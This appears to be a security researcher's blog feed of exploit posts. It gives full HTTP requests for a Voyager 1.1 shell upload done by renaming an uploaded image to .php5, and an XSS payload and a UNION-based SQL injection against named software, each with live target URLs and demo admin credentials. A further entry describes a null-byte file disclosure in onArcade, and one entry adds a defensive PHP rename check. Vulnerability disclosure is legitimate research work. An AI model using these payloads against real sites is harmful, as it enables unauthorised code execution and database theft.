deyaamuhammad · 6 years
Voyager 1.1 Shell Upload
# Exploit Title: Voyager 1.1 - Arbitrary File Upload
# Google Dork: N/A
# Date: 1 Jan 2019
# Exploit Author: Deyaa Muhammad
# Author EMail: contact [at] deyaa.me
# Author Blog: http://deyaa.me
# Poc Video: https://youtu.be/5GnHbFqRP9M
# Vendor Homepage: https://laravelvoyager.com/
# Software Link: https://github.com/the-control-group/voyager
# Demo Website: http://demo.meteorsa.com/Beemedia
# Demo Admin Panel: http://demo.meteorsa.com/Beemedia/admin
# Demo Admin Credentials: [email protected]/password
# Version: 1.1.11
# Tested on: WIN7_x68/Linux2.6.32-896.16.1.lve1.4.54.el6.x86_64
# CVE : N/A

# Description
The .htaccess extension restrictions can be bypassed by renaming shell.png to shell.php5. The exploit works because the Laravel and Voyager extension filters fail to block the rename.
#Upload Request
POST /Beemedia/admin/media/upload HTTP/1.1
Host: demo.meteorsa.com
Connection: keep-alive
Content-Length: 1203
Accept: application/json
Cache-Control: no-cache
Origin: http://demo.meteorsa.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryBfiKW54AxLABftaB
Referer: http://demo.meteorsa.com/Beemedia/admin/media
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: XSRF-TOKEN=eyJpdiI6ImhMWXRCQVwvTVlLbTRkYVFpSzZmYWRBPT0iLCJ2YWx1ZSI6InQxUlFvZWFHeFhPUm02dUxMYzBUaVY4aUFXREZwV3JvQ01rb0VJOFdOQ1wvM2tLdWFLZWVORms1YzMyaU9TUDdDIiwibWFjIjoiMDk5YzNkMmNkZmEyMGJmNGM4Njc0NDg3ZjY3OWIyMzBlMGE3MTFhZDI2OWNhNmZmZWI0MjdiZTdmNDViYzg1MSJ9; laravel_session=eyJpdiI6ImNyc3F6UEJONlhtdHBoQXlxbXdOdlE9PSIsInZhbHVlIjoiU0piSGlGN2tETU1oem9KU3RscVlhb0NIWUxTN01UWjhRMnJ2ZXgwRjZ1dlFMQ1FRVnZiUVh1Q1Q5RUhFXC9PM2siLCJtYWMiOiI2NGE4OWFiNTlhOTQ5MjY1ZmZlZjViMzJhZjI1OTk5MDNhZGI5ZmQ2OGQ4NTJiYWI0ZTE4NmE4MjhlYzUyOGFhIn0%3D

------WebKitFormBoundaryBfiKW54AxLABftaB
Content-Disposition: form-data; name="_token"

of3KiGsiLLx5meVLJLocDCZjj7uZxWGQdG43LCbC
------WebKitFormBoundaryBfiKW54AxLABftaB
Content-Disposition: form-data; name="upload_path"

------WebKitFormBoundaryBfiKW54AxLABftaB
Content-Disposition: form-data; name="file"; filename="wv.png"
Content-Type: image/png

------WebKitFormBoundaryBfiKW54AxLABftaB--
#Rename Request
POST /Beemedia/admin/media/rename_file HTTP/1.1
Host: demo.meteorsa.com
Connection: keep-alive
Content-Length: 157
Accept: */*
Origin: http://demo.meteorsa.com
X-CSRF-TOKEN: of3KiGsiLLx5meVLJLocDCZjj7uZxWGQdG43LCbC
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Referer: http://demo.meteorsa.com/Beemedia/admin/media
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: XSRF-TOKEN=eyJpdiI6IjU1TXZaVVZoUmFXcFpIcXBWKzE2T2c9PSIsInZhbHVlIjoiV1hLTVwvbk9ZVGRLY3ErUlJoNlwvRlV0TkpIcTJOSFwvQnI2WFltdEFyWTZzZEtRdENreXFLbG1EcFR0WmlONUhkMCIsIm1hYyI6ImM2YzQwZTdiOGYzMDQ1MTE1MjE4MjJhMDkzZTcwYWM1ZmU5ZmY0MmYzZTQ1YjEwODZlOGIzMjA3ZTE4ODZkOGIifQ%3D%3D; laravel_session=eyJpdiI6IksyS2xBczMrdlJ4SHdtVDN0QWhLR1E9PSIsInZhbHVlIjoiNHZvU0wzeEF5MkpcLzlONEFvN09XMXlZSkljbDFJVHo0aE81aGtOSm1QaHBZUmpZaHNndmJmeUZqVFdtS1lycHMiLCJtYWMiOiIzZWI5YjNhOGFkNWU4YjdiZjNkM2FhMDFlODY4MjkyMDk3NjdlZTQ4YjMwYjE1MTEyZDM3YzU1NzAyYjNlYTEyIn0%3D

filename=LWVxh2eHAtZYxigmkPVzSeB5YdclRG5ogwqEp0lA.&new_filename=LWVxh2eHAtZYxigmkPVzSeB5YdclRG5ogwqEp0lA.php5&_token=of3KiGsiLLx5meVLJLocDCZjj7uZxWGQdG43LCbC
#References: https://packetstormsecurity.com/files/150963/Voyager-1.1-Shell-Upload.html
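
The rename step succeeds because the extension is not checked again after upload. The following is an added example of a rename-time check, not code from Voyager or from the original post; the function name `validateRename` and the allowlist are assumptions for illustration.

```php
<?php
declare(strict_types=1);

// Added example; hypothetical helper, not Voyager code. The allowlist is an assumption.
const ALLOWED_EXTENSIONS = ['png', 'jpg', 'jpeg', 'gif', 'webp'];

/** @return array{0: bool, 1: string} [allowed, reason] */
function validateRename(string $oldName, string $newName): array
{
    // No path separators, NUL bytes or control characters in the new name.
    if ($newName === '' || preg_match('#[/\\\\\x00-\x1f]#', $newName) === 1) {
        return [false, 'illegal character'];
    }
    // No dotfiles (such as .htaccess) and no trailing dot.
    if ($newName[0] === '.' || substr($newName, -1) === '.') {
        return [false, 'leading or trailing dot'];
    }
    $segments = explode('.', strtolower($newName));
    array_shift($segments);            // drop the base name
    if ($segments === []) {
        return [false, 'missing extension'];
    }
    $newExt = array_pop($segments);    // final extension
    $oldExt = strtolower(pathinfo($oldName, PATHINFO_EXTENSION));
    if (!in_array($newExt, ALLOWED_EXTENSIONS, true)) {
        return [false, "extension .$newExt not allowed"];
    }
    // A rename must not change the type that was validated at upload time.
    if ($newExt !== $oldExt) {
        return [false, 'extension change on rename'];
    }
    // Intermediate segments ("x.php.png") can still reach a PHP handler on some Apache setups.
    foreach ($segments as $segment) {
        if (preg_match('/^(ph(p\d*|tml|ar|t|ps)|cgi|pl|py|sh|htaccess)$/', $segment) === 1) {
            return [false, "executable segment .$segment"];
        }
    }
    return [true, 'ok'];
}

// Constructed sample renames; the first is the case described in the post.
$samples = [['shell.png', 'shell.php5'], ['a.png', 'a.php.png'], ['a.png', '.htaccess'], ['cat.png', 'kitten.png']];
foreach ($samples as [$old, $new]) {
    [$ok, $why] = validateRename($old, $new);
    printf("%-10s -> %-12s %s (%s)\n", $old, $new, $ok ? 'ALLOW' : 'DENY', $why);
}
```

Serving the media storage directory with script execution disabled is an independent second control, so a missed filename check does not become code execution.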
deyaamuhammad · 6 years
Mediat 1.4.1 - Cross-site Scripting
# Exploit Title: Mediat 1.4.1 - Cross-site Script
# Google Dork: N/A
# Date: 1 Jan 2019
# Exploit Author: Deyaa Muhammad
# Author EMail: contact [at] deyaa.me
# Author Blog: http://deyaa.me
# Vendor Homepage: http://webfairy.net/
# Software Link: https://github.com/WebFairyNet/Mediat
# Demo Website: http://mediat.webfairy.net/
# Version: 1.4
# Tested on: WIN7_x68/Linux
# CVE : N/A

# Description: An XSS vulnerability was found in the search section of "WebFairy Mediat 1.4.1".
# POC Request: http://[PATH]/search.html?query="><script>alert('Deyaa')</script>
#Live Target: http://mediat.webfairy.net/arabic_demo/search.html?query="><script>alert('Deyaa')</script>
References: https://packetstormsecurity.com/files/150962/WebFairy-Mediat-1.4.1-Cross-Site-Scripting.html
deyaamuhammad · 6 years
All in One Video Downloader 1.2 - SQL Injection
# Exploit Title: All in One Video Downloader 1.2 - SQL Injection
# Google Dork: "developed by Niche Office"
# Date: 1 Jan 2019
# Exploit Author: Deyaa Muhammad
# Author EMail: contact [at] deyaa.me
# Author Blog: http://deyaa.me
# Vendor Homepage: https://nicheoffice.web.tr/
# Software Link: https://codecanyon.net/item/all-in-one-video-downloader-youtube-and-more/22599418
# Demo Website: https://aiovideodl.ml/
# Demo Admin Panel: https://aiovideodl.ml/admin/
# Demo Admin Credentials: [email protected]/123456
# Version: 1.2
# Tested on: WIN7_x68/cloudflare
# CVE : N/A
# POC: https://[PATH]/admin/?view=page-edit&id=2.9'+[SQLI]-- -
# Exploit: https://[PATH]/admin/?view=page-edit&id=2.9'+UNION+SELECT+1,2,3,4,concat(user(),0x3a3a,database(),0x3a3a,version())-- -
#Live Target: https://aiovideodl.ml/admin/?view=page-edit&id=2.9'+UNION+SELECT+1,2,3,4,concat(user(),0x3a3a,database(),0x3a3a,version())-- -
# References: https://packetstormsecurity.com/files/150955/All-In-One-Video-Downloader-1.2-SQL-Injection.html
deyaamuhammad · 8 years
onArcade 2.4.x Local File Disclosure
[1] INTRO
onArcade is a nice PHP CMS that handles video and online game content. The template file handler does not filter its input sufficiently, which leads to a Local File Disclosure vulnerability.

[2] Vulnerable Versions
onArcade 2.4.2
onArcade 2.4.1
onArcade 2.4.0

[3] Bug Track
Because of the special treatment of the .php extension, files with a .php extension cannot be read directly. However, a null byte can be used to bypass this and "drop" the extension from the file path when PHP <= 5.3.4.

[4] POC Video
[5] Links
https://packetstormsecurity.com/files/141792/onArcade-2.4.x-Local-File-Disclosure.html
http://0day.today/exploit/description/27410
deyaamuhammad · 8 years
Video
Using Cisco Packet Tracer under Ubuntu
deyaamuhammad · 8 years
Hello World
Hello world,
In my short life, I've gained skills, and taken up and left a lot of hobbies. I have never been interested in blogging or internet communities.
I always saw it this way: the more obvious you are on the internet, the more easily people can break into your life and privacy.
Finally, I've realized that blogging and sharing your thoughts over the internet may be not that bad. Due to the fact that I like computers more than people, I think it's better to share your thoughts with people over computers.